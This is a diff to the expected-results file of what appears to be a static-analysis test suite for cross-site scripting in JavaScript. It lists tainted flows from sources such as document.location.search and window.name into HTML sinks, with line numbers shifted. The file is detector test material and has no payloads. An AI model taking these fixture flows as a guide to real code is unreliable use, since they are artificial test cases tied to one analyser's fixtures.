    " | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
    " ...
    " | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
    " ...
    " | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
    ' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | @@ -1289,7 +1289,7 @@ subpaths | dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | | dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | | event-handler-receiver.js:2:31:2:83 | '

    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | | jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | 
@@ -1307,7 +1307,7 @@ subpaths | jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | | optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | | optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... 
.search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | 
@@ -1353,7 +1353,7 @@ subpaths | tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | | trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | | trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | | tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | 
@@ -1361,97 +1361,97 @@ subpaths | tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... 
.search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... 
.search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... 
.search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... 
.search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... 
.search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. 
| tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... 
.search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... 
'#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... 
.search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... 
